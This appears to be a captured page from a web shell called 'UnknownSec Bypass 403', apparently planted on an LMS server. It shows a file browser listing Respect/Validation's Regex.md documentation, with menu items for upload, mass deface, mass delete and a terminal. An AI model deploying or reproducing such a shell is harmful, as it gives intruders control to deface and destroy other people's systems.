UnknownSec Bypass
403
:
/
mnt
/
lmsestudio-instance-vol002
/
lms_a852e4e4c22f
/
vendor
/
respect
/
validation
/
docs
/
rules
/ [
drwxr-xr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
Regex.md
# Regex - `v::regex(string $regex)` Evaluates a regex on the input and validates if matches ```php v::regex('/[a-z]/')->validate('a'); // true ``` Message template for this validator includes `{{regex}}` *** See also: * [Alnum](Alnum.md) * [Alpha](Alpha.md) * [Contains](Contains.md) * [Digit](Digit.md) * [EndsWith](EndsWith.md) * [StartsWith](StartsWith.md)
Copyright © 2026 - UnknownSec